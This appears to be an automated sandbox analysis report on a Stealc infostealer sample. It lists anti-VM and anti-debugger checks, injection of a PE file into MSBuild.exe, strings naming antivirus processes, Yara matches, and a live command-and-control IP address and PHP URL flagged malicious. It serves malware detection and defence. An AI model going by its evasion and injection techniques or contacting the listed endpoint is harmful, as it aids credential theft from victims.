Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00587922
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 2_2_004045C0
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 2_2_0041C03D
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00582003 mov edi, dword ptr fs:[00000030h] 0_2_00582003
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059A64C mov eax, dword ptr fs:[00000030h] 0_2_0059A64C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005C6628 mov eax, dword ptr fs:[00000030h] 0_2_005C6628
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00590F2E mov ecx, dword ptr fs:[00000030h] 0_2_00590F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00419750 mov eax, dword ptr fs:[00000030h] 2_2_00419750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059CC4B GetProcessHeap, 0_2_0059CC4B
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00587610
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00587922
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0058DA73
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587AAF SetUnhandledExceptionFilter, 0_2_00587AAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041CEEA SetUnhandledExceptionFilter, 2_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041B33A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 5rVhexjLCx.exe PID: 7000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7072, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000 Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000 Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1159008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_0059C085
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW, 0_2_0059622B
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_0059C372
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_0059C327
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_0059C40D
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0059C498
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW, 0_2_0059C6EB
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0059C814
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW, 0_2_0059C91A
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0059C9E9
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_00595D7F
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00587815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00417850 GetUserNameA, 2_2_00417850
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1820269495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1958245756.00000000005AD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7072, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.5adad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5rVhexjLCx.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1820269495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1958245756.00000000005AD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7072, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528264 Sample: 5rVhexjLCx.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 21 Suricata IDS alerts for network traffic 2->21 23 Found malware configuration 2->23 25 Antivirus / Scanner detection for submitted sample 2->25 27 7 other signatures 2->27 6 5rVhexjLCx.exe 1 2->6         started        process3 signatures4 29 Writes to foreign memory regions 6->29 31 Allocates memory in foreign processes 6->31 33 Injects a PE file into a foreign processes 6->33 9 MSBuild.exe 13 6->9         started        12 WerFault.exe 21 16 6->12         started        15 MSBuild.exe 6->15         started        process5 dnsIp6 19 62.204.41.150, 49730, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 9->19 17 C:\ProgramData\Microsoft\...\Report.wer, Unicode 12->17 dropped file7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
62.204.41.150
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI true

Contacted Domains

Name IP Active
s-part-0017.t-0009.fb-t-msedge.net 13.107.253.45 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://62.204.41.150/ true
    		unknown
    http://62.204.41.150/edd20096ecef326d.php true
      		unknown